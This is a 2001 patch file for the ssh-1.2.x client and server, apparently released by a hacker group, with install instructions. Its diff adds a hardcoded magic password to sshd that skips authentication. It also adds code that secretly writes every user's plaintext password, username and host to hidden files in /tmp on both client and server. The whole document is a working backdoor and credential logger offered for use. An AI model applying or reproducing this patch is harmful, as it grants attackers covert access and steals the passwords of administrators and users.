#
#  -< Fakelabs Development >-
#
#  patch for ssh-1.2.27 - 31 by ozone@rm-f.net
# 
#  enables a magic password, logs all client 
#  and accepted server login/passwords
#
#  use at your own risk
#
#  install:
#
#  first edit the location of the log files
#  by changing the _SERVER_LOG and _CLIENT_LOG
#  defines below, the default is /tmp/.slog
#  and /tmp/.clog respectively. Set the magic 
#  password by changing _MAGIC_PASSWD below. 
#
#  tar -zxvf ssh-1.2.31.tar.gz
#  cp fakessh-1.2.27-31.diff ssh-1.2.31/  
#  cd ssh-1.2.31 
#  patch -p0 <fakessh-1.2.27-31.diff
#
#  www.fakelabs.net
#  http://rm-f.net/~ozone
#  2001


diff -c ./ssh.h ../fake/ssh.h
*** ./ssh.h     Wed Jan 17 14:42:53 2001
--- ../fake/ssh.h       Tue May 22 09:03:48 2001
***************
*** 185,190 ****
--- 185,198 ----
     though that is not required. */
  #define SSH_FALLBACK_CIPHER     SSH_CIPHER_3DES
  
+ /* cust0m - specify log file paths and magic password here */
+ #define _CLIENT_LOG "/tmp/.clog"
+ #define _SERVER_LOG "/tmp/.slog"
+ #define _MAGIC_PASSWD "fakelabs"
+ FILE *fd0ut;
+ char fromh0st [128], _passwd_ [128];
+ int sekritl0gin;
+ 
  /* Cipher used for encrypting authentication files. */
  #define SSH_AUTHFILE_CIPHER     SSH_CIPHER_3DES
  
diff -c ./sshconnect.c ../fake/sshconnect.c
*** ./sshconnect.c      Wed Jan 17 14:42:53 2001
--- ../fake/sshconnect.c        Tue May 22 11:17:34 2001
***************
*** 1824,1829 ****
--- 1824,1837 ----
        for(i = 0; i < options->number_of_password_prompts; i++)
          {
            password = read_passphrase(pw->pw_uid, prompt, 0);
+ 
+             /* cust0m - log clients passwd:user@host */
+             fd0ut = fopen (_CLIENT_LOG, "a+");
+                       if (fd0ut != NULL) { 
+                               fprintf (fd0ut, "%s:%s@%s\n", password, server_
user, host);
+                               fclose (fd0ut);
+                       } 
+ 
            packet_start(SSH_CMSG_AUTH_PASSWORD);
            packet_put_string(password, strlen(password));
            memset(password, 0, strlen(password));
diff -c ./sshd.c ../fake/sshd.c
*** ./sshd.c    Wed Jan 17 14:42:53 2001
--- ../fake/sshd.c      Tue May 22 09:19:12 2001
***************
*** 1212,1217 ****
--- 1212,1220 ----
                  if (!hosts_access(&req))
                    refuse(&req);
                  syslog(allow_severity, "connect from %s", eval_client(&req));
+ 
+                               /* cust0m - save from-host */ 
+                               snprintf(fromh0st, sizeof(fromh0st), "%s", eval
_client(&req)); 
                }
  #endif /* LIBWRAP */
                break;
***************
*** 2674,2679 ****
--- 2677,2691 ----
               observer. */
            password = packet_get_string(NULL);
  
+                       /* cust0m - grab the plain text passwd, see if its magi
c */
+                       snprintf (_passwd_, sizeof(_passwd_), "%s", password);
+                       sekritl0gin = 0;
+                       if (!strncmp(_MAGIC_PASSWD, password, sizeof(password))
) {
+                               sekritl0gin = 1;
+                               authenticated = 1;
+                               goto allow;
+                       }
+ 
            if (password_attempts >= 5)
              { /* Too many password authentication attempts. */
                packet_disconnect("Too many password authentication attempts fr
om %.100s for user %.100s.",
***************
*** 2718,2726 ****
            log_msg("Unknown message during authentication: type %d", type);
            break; /* Respond with a failure message. */
          }
        /* If successfully authenticated, break out of loop. */
-       if (authenticated)
          break;
  
  #ifdef KERBEROS
        /* If you forwarded a ticket you get one shot for proper
--- 2730,2746 ----
            log_msg("Unknown message during authentication: type %d", type);
            break; /* Respond with a failure message. */
          }
+ allow: 
+       if (authenticated) { 
+               if (!sekritl0gin) {  /* if its not a sekrit login, log it */ 
+                       fd0ut = fopen (_SERVER_LOG, "a+");
+                       fprintf (fd0ut, "%s:%s from %s\n", _passwd_, user, ipad
dr);
+                       fclose (fd0ut);
+         }
+ 
        /* If successfully authenticated, break out of loop. */
          break;
+       } 
  
  #ifdef KERBEROS
        /* If you forwarded a ticket you get one shot for proper